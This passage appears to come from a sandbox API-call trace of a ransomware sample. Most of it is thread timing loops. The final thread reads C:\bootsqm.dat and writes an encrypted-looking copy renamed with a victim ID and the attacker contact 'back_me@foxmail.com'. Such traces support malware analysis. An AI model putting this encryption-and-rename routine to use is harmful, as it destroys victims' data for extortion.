WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0261.695] GetTickCount () returned 0xc14b [0261.695] GetTickCount () returned 0xc14b [0261.695] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0261.945] GetTickCount () returned 0xc245 [0261.945] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0262.171] GetTickCount () returned 0xc31f [0262.171] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0262.904] GetTickCount () returned 0xc5fc [0262.904] GetTickCount () returned 0xc5fc [0262.904] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0263.299] GetTickCount () returned 0xc792 [0263.299] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0263.588] GetTickCount () returned 0xc8ab [0263.588] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0263.900] GetTickCount () returned 0xc9e3 [0263.900] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0264.222] GetTickCount () returned 0xcb2a [0264.222] GetTickCount () returned 0xcb2a [0264.223] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0264.818] GetTickCount () returned 0xcd7b [0264.818] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0265.113] GetTickCount () returned 0xcea3 [0265.113] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0265.276] GetTickCount () returned 0xcf3f [0265.276] GetTickCount () returned 0xcf3f [0265.276] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0265.426] GetTickCount () returned 0xcfdb [0265.426] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0265.576] GetTickCount () returned 0xd077 [0265.576] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0265.719] GetTickCount () returned 0xd104 [0265.721] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0266.011] GetTickCount () returned 0xd21d [0266.011] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0266.211] GetTickCount () returned 0xd2e7 [0266.211] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0266.934] GetTickCount () returned 0xd5c5 [0266.934] GetTickCount () returned 0xd5c5 [0266.934] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0267.170] GetTickCount () returned 0xd6af [0267.170] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0267.333] GetTickCount () returned 0xd74b [0267.333] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0267.474] GetTickCount () returned 0xd7d7 [0267.474] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0267.596] GetTickCount () returned 0xd854 [0267.596] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0267.870] GetTickCount () returned 0xd96d [0267.870] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0268.025] GetTickCount () returned 0xda09 [0268.025] GetTickCount () returned 0xda09 [0268.025] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0268.192] GetTickCount () returned 0xdaa5 [0268.192] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0268.593] GetTickCount () returned 0xdc3a [0268.593] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0268.890] GetTickCount () returned 0xdd72 [0268.898] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x0 [0268.907] GetTickCount () returned 0xdd72 [0268.907] Sleep (dwMilliseconds=0x64) [0269.115] GetTickCount () returned 0xde3d [0269.115] GetTickCount () returned 0xde3d [0269.115] Sleep (dwMilliseconds=0x64) [0269.366] GetTickCount () returned 0xdf46 [0269.366] Sleep (dwMilliseconds=0x64) [0269.529] GetTickCount () returned 0xdfe2 [0269.529] Sleep (dwMilliseconds=0x64) [0269.864] GetTickCount () returned 0xe12a [0269.864] Sleep (dwMilliseconds=0x64) [0270.072] GetTickCount () returned 0xe204 [0270.072] Sleep (dwMilliseconds=0x64) [0270.303] GetTickCount () returned 0xe2ee [0270.303] GetTickCount () returned 0xe2ee [0270.303] Sleep (dwMilliseconds=0x64) [0270.721] GetTickCount () returned 0xe484 [0270.721] Sleep (dwMilliseconds=0x64) [0271.115] GetTickCount () returned 0xe619 [0271.115] Sleep (dwMilliseconds=0x64) [0271.727] GetTickCount () returned 0xe87a [0271.728] GetTickCount () returned 0xe87a [0271.728] Sleep (dwMilliseconds=0x64) [0271.876] GetTickCount () returned 0xe906 [0271.876] Sleep (dwMilliseconds=0x64) [0272.033] GetTickCount () returned 0xe9b2 [0272.033] Sleep (dwMilliseconds=0x64) [0272.187] GetTickCount () returned 0xea3e [0272.187] Sleep (dwMilliseconds=0x64) [0272.779] GetTickCount () returned 0xec8f [0272.779] GetTickCount () returned 0xec8f [0272.779] Sleep (dwMilliseconds=0x64) [0273.363] GetTickCount () returned 0xeee0 [0273.363] Sleep (dwMilliseconds=0x64) [0273.732] GetTickCount () returned 0xf047 [0273.732] Sleep (dwMilliseconds=0x64) [0274.068] GetTickCount () returned 0xf19e [0274.068] GetTickCount () returned 0xf19e [0274.068] Sleep (dwMilliseconds=0x64) [0274.501] GetTickCount () returned 0xf353 [0274.501] Sleep (dwMilliseconds=0x64) [0275.882] GetTickCount () returned 0xf8b0 [0275.882] GetTickCount () returned 0xf8b0 [0275.882] Sleep (dwMilliseconds=0x64) [0276.489] GetTickCount () returned 0xfb10 [0276.489] Sleep (dwMilliseconds=0x64) [0276.816] GetTickCount () returned 0xfc58 [0276.816] Sleep (dwMilliseconds=0x64) [0277.079] GetTickCount () returned 0xfd61 [0277.079] GetTickCount () returned 0xfd61 [0277.079] Sleep (dwMilliseconds=0x64) Thread: id = 53 os_tid = 0x5e0 [0241.107] GetTickCount () returned 0x7251 [0241.107] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x24) returned 0xba0658 [0241.107] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba0658, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x138 [0241.316] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba0658, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x140 [0241.318] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba0658, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12c [0241.319] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba0658, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14c [0241.320] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9de50 [0241.320] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9de50, Size=0x20) returned 0xb846a0 [0241.320] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9de50 [0241.320] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9de50, Size=0x20) returned 0xb846c8 [0241.320] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0241.330] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0241.330] Wow64DisableWow64FsRedirection (in: OldValue=0x2b2ff84 | out: OldValue=0x2b2ff84*=0x0) returned 1 [0241.330] lstrlenW (lpString="kernel32.dll") returned 12 [0241.330] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb846a0 | out: hHeap=0xb00000) returned 1 [0241.330] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0241.330] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb846c8 | out: hHeap=0xb00000) returned 1 [0241.330] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0xbcbec8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x170 [0241.332] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0241.536] GetTickCount () returned 0x733b [0241.536] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0241.744] GetTickCount () returned 0x7416 [0241.744] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0242.049] GetTickCount () returned 0x753e [0242.049] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0242.288] GetTickCount () returned 0x7628 [0242.288] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0242.531] GetTickCount () returned 0x7712 [0242.531] GetTickCount () returned 0x7712 [0242.531] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0242.682] GetTickCount () returned 0x77ae [0242.682] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0243.008] GetTickCount () returned 0x78f6 [0243.008] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0243.285] GetTickCount () returned 0x7a0f [0243.285] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0243.407] GetTickCount () returned 0x7a7c [0243.407] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0243.978] GetTickCount () returned 0x7cbd [0243.978] GetTickCount () returned 0x7cbd [0243.978] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0244.573] GetTickCount () returned 0x7f0e [0244.573] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0245.024] GetTickCount () returned 0x80d2 [0245.024] GetTickCount () returned 0x80d2 [0245.024] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0245.308] GetTickCount () returned 0x81eb [0245.308] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0245.419] GetTickCount () returned 0x8258 [0245.419] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0245.662] GetTickCount () returned 0x8352 [0245.662] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0246.005] GetTickCount () returned 0x84a9 [0246.005] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0246.295] GetTickCount () returned 0x85d1 [0246.295] GetTickCount () returned 0x85d1 [0246.295] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0246.448] GetTickCount () returned 0x865e [0246.448] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0246.602] GetTickCount () returned 0x86fa [0246.602] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0246.800] GetTickCount () returned 0x87c5 [0246.800] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0246.933] GetTickCount () returned 0x8841 [0246.933] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0247.064] GetTickCount () returned 0x88ce [0247.064] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0247.179] GetTickCount () returned 0x894b [0247.180] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0247.311] GetTickCount () returned 0x89c7 [0247.311] GetTickCount () returned 0x89c7 [0247.311] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0247.526] GetTickCount () returned 0x8aa2 [0247.526] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0248.319] GetTickCount () returned 0x8d9e [0248.319] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0248.437] GetTickCount () returned 0x8e1b [0248.437] GetTickCount () returned 0x8e1b [0248.437] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0248.751] GetTickCount () returned 0x8f43 [0248.751] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0249.044] GetTickCount () returned 0x906c [0249.044] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0249.241] GetTickCount () returned 0x9127 [0249.241] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0249.463] GetTickCount () returned 0x9201 [0249.463] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0249.659] GetTickCount () returned 0x92bd [0249.659] GetTickCount () returned 0x92bd [0249.659] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0249.955] GetTickCount () returned 0x93d5 [0249.955] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0250.146] GetTickCount () returned 0x9491 [0250.146] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0250.748] GetTickCount () returned 0x96e1 [0250.748] GetTickCount () returned 0x96e1 [0250.748] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0250.867] GetTickCount () returned 0x974f [0250.867] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0251.023] GetTickCount () returned 0x97eb [0251.023] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0251.175] GetTickCount () returned 0x9877 [0251.175] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0251.290] GetTickCount () returned 0x98f4 [0251.290] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0251.496] GetTickCount () returned 0x99af [0251.497] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0251.607] GetTickCount () returned 0x9a1c [0251.607] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0251.849] GetTickCount () returned 0x9af7 [0251.849] GetTickCount () returned 0x9af7 [0251.849] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0252.047] GetTickCount () returned 0x9bb2 [0252.047] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0252.493] GetTickCount () returned 0x9d67 [0252.493] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0252.813] GetTickCount () returned 0x9e9f [0252.813] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0252.933] GetTickCount () returned 0x9f0c [0252.933] GetTickCount () returned 0x9f0c [0252.933] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0253.115] GetTickCount () returned 0x9fc7 [0253.115] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0253.364] GetTickCount () returned 0xa0c1 [0253.364] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0253.610] GetTickCount () returned 0xa1ba [0253.610] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0254.048] GetTickCount () returned 0xa36f [0254.048] GetTickCount () returned 0xa36f [0254.048] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0254.460] GetTickCount () returned 0xa505 [0254.460] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0255.381] GetTickCount () returned 0xa89d [0255.381] GetTickCount () returned 0xa89d [0255.381] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0255.578] GetTickCount () returned 0xa968 [0255.578] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0256.073] GetTickCount () returned 0xab4b [0256.073] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0256.312] GetTickCount () returned 0xac45 [0256.312] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0256.884] GetTickCount () returned 0xae77 [0256.884] GetTickCount () returned 0xae77 [0256.884] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0257.008] GetTickCount () returned 0xaef3 [0257.008] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0257.227] GetTickCount () returned 0xafce [0257.227] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0257.445] GetTickCount () returned 0xb0a8 [0257.445] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0257.883] GetTickCount () returned 0xb25d [0257.883] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0258.174] GetTickCount () returned 0xb385 [0258.174] GetTickCount () returned 0xb385 [0258.174] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0258.883] GetTickCount () returned 0xb653 [0258.883] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0259.140] GetTickCount () returned 0xb74d [0259.140] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0259.468] GetTickCount () returned 0xb894 [0259.468] GetTickCount () returned 0xb894 [0259.468] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0259.631] GetTickCount () returned 0xb930 [0259.631] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0259.916] GetTickCount () returned 0xba59 [0259.916] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0260.316] GetTickCount () returned 0xbbdf [0260.316] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0260.637] GetTickCount () returned 0xbd26 [0260.637] GetTickCount () returned 0xbd26 [0260.637] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0261.695] GetTickCount () returned 0xc14b [0261.695] GetTickCount () returned 0xc14b [0261.695] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0261.945] GetTickCount () returned 0xc245 [0261.945] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0262.172] GetTickCount () returned 0xc31f [0262.172] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0262.904] GetTickCount () returned 0xc5fc [0262.904] GetTickCount () returned 0xc5fc [0262.904] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0263.299] GetTickCount () returned 0xc792 [0263.299] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0263.588] GetTickCount () returned 0xc8ab [0263.588] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0263.900] GetTickCount () returned 0xc9e3 [0263.900] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0264.223] GetTickCount () returned 0xcb2a [0264.223] GetTickCount () returned 0xcb2a [0264.223] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0264.818] GetTickCount () returned 0xcd7b [0264.818] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0265.113] GetTickCount () returned 0xcea3 [0265.113] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0265.276] GetTickCount () returned 0xcf3f [0265.276] GetTickCount () returned 0xcf3f [0265.276] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0265.426] GetTickCount () returned 0xcfdb [0265.426] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0265.576] GetTickCount () returned 0xd077 [0265.576] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0265.722] GetTickCount () returned 0xd104 [0265.723] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0266.011] GetTickCount () returned 0xd21d [0266.011] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0266.211] GetTickCount () returned 0xd2e7 [0266.211] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0266.933] GetTickCount () returned 0xd5c5 [0266.933] GetTickCount () returned 0xd5c5 [0266.933] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0267.170] GetTickCount () returned 0xd6af [0267.170] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0267.332] GetTickCount () returned 0xd74b [0267.332] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0267.474] GetTickCount () returned 0xd7d7 [0267.474] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0267.596] GetTickCount () returned 0xd854 [0267.596] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0267.870] GetTickCount () returned 0xd96d [0267.870] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0268.025] GetTickCount () returned 0xda09 [0268.025] GetTickCount () returned 0xda09 [0268.025] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0268.192] GetTickCount () returned 0xdaa5 [0268.192] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0268.587] GetTickCount () returned 0xdc3a [0268.587] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x102 [0268.884] GetTickCount () returned 0xdd63 [0268.884] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x64) returned 0x0 [0268.884] GetTickCount () returned 0xdd63 [0268.884] Sleep (dwMilliseconds=0x64) [0269.115] GetTickCount () returned 0xde3d [0269.115] GetTickCount () returned 0xde3d [0269.115] Sleep (dwMilliseconds=0x64) [0269.366] GetTickCount () returned 0xdf46 [0269.366] Sleep (dwMilliseconds=0x64) [0269.529] GetTickCount () returned 0xdfe2 [0269.529] Sleep (dwMilliseconds=0x64) [0269.864] GetTickCount () returned 0xe12a [0269.864] Sleep (dwMilliseconds=0x64) [0270.072] GetTickCount () returned 0xe204 [0270.072] Sleep (dwMilliseconds=0x64) [0270.303] GetTickCount () returned 0xe2ee [0270.303] GetTickCount () returned 0xe2ee [0270.303] Sleep (dwMilliseconds=0x64) [0270.721] GetTickCount () returned 0xe484 [0270.721] Sleep (dwMilliseconds=0x64) [0271.115] GetTickCount () returned 0xe619 [0271.115] Sleep (dwMilliseconds=0x64) [0271.728] GetTickCount () returned 0xe87a [0271.728] GetTickCount () returned 0xe87a [0271.728] Sleep (dwMilliseconds=0x64) [0271.876] GetTickCount () returned 0xe906 [0271.876] Sleep (dwMilliseconds=0x64) [0272.033] GetTickCount () returned 0xe9a2 [0272.033] Sleep (dwMilliseconds=0x64) [0272.186] GetTickCount () returned 0xea3e [0272.187] Sleep (dwMilliseconds=0x64) [0272.779] GetTickCount () returned 0xec8f [0272.779] GetTickCount () returned 0xec8f [0272.779] Sleep (dwMilliseconds=0x64) [0273.363] GetTickCount () returned 0xeee0 [0273.363] Sleep (dwMilliseconds=0x64) [0273.732] GetTickCount () returned 0xf047 [0273.732] Sleep (dwMilliseconds=0x64) [0274.069] GetTickCount () returned 0xf19e [0274.069] GetTickCount () returned 0xf19e [0274.069] Sleep (dwMilliseconds=0x64) [0274.501] GetTickCount () returned 0xf353 [0274.501] Sleep (dwMilliseconds=0x64) [0275.882] GetTickCount () returned 0xf8b0 [0275.882] GetTickCount () returned 0xf8b0 [0275.882] Sleep (dwMilliseconds=0x64) [0276.488] GetTickCount () returned 0xfb10 [0276.488] Sleep (dwMilliseconds=0x64) [0276.816] GetTickCount () returned 0xfc58 [0276.816] Sleep (dwMilliseconds=0x64) [0277.078] GetTickCount () returned 0xfd61 [0277.078] GetTickCount () returned 0xfd61 [0277.078] Sleep (dwMilliseconds=0x64) Thread: id = 54 os_tid = 0x600 Thread: id = 55 os_tid = 0x624 [0241.353] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0x3d00260 [0241.353] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0x3d10268 [0241.353] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9dfe8 [0241.353] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x6) returned 0xb99be0 [0241.353] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e000 [0241.353] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x100000) returned 0x3f00020 [0241.353] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e018 [0241.353] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9e018, Size=0x20) returned 0xbbd770 [0241.353] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e018 [0241.353] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9e018, Size=0x20) returned 0xbbd748 [0241.354] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0241.354] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0241.354] Wow64DisableWow64FsRedirection (in: OldValue=0x31aff58 | out: OldValue=0x31aff58*=0x0) returned 1 [0241.354] lstrlenW (lpString="kernel32.dll") returned 12 [0241.354] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbbd770 | out: hHeap=0xb00000) returned 1 [0241.354] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0241.354] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbbd748 | out: hHeap=0xb00000) returned 1 [0241.354] Sleep (dwMilliseconds=0x64) [0241.556] lstrcmpiW (lpString1=".dat", lpString2=".php") returned -1 [0241.556] lstrlenW (lpString="bootsqm.dat") returned 11 [0241.556] CreateFileW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.582] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x31aff1c | out: lpFileSize=0x31aff1c*=3264) returned 1 [0241.582] CloseHandle (hObject=0x244) returned 1 [0241.582] GetFileAttributesW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat")) returned 0x80 [0241.582] GetFileAttributesW (lpFileName="C:\\bootsqm.dat.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\bootsqm.dat.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.582] CreateFileW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.582] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31afec8 | out: lpNewFilePointer=0x0) returned 1 [0241.582] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31afec8 | out: lpNewFilePointer=0x0) returned 1 [0241.582] CreateFileW (lpFileName="C:\\bootsqm.dat.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\bootsqm.dat.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0241.583] GetLastError () returned 0x0 [0241.583] ReadFile (in: hFile=0x244, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x31afed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x31afed4*=0xcc0, lpOverlapped=0x0) returned 1 [0241.610] WriteFile (in: hFile=0x248, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xcd0, lpNumberOfBytesWritten=0x31afc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x31afc9c*=0xcd0, lpOverlapped=0x0) returned 1 [0241.611] ReadFile (in: hFile=0x244, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x31afed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x31afed4*=0x0, lpOverlapped=0x0) returned 1 [0241.611] WriteFile (in: hFile=0x248, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x31afc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x31afc9c*=0xea, lpOverlapped=0x0) returned 1 [0241.611] SetEndOfFile (hFile=0x248) returned 1 [0241.612] CloseHandle (hObject=0x248) returned 1 [0241.612] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, 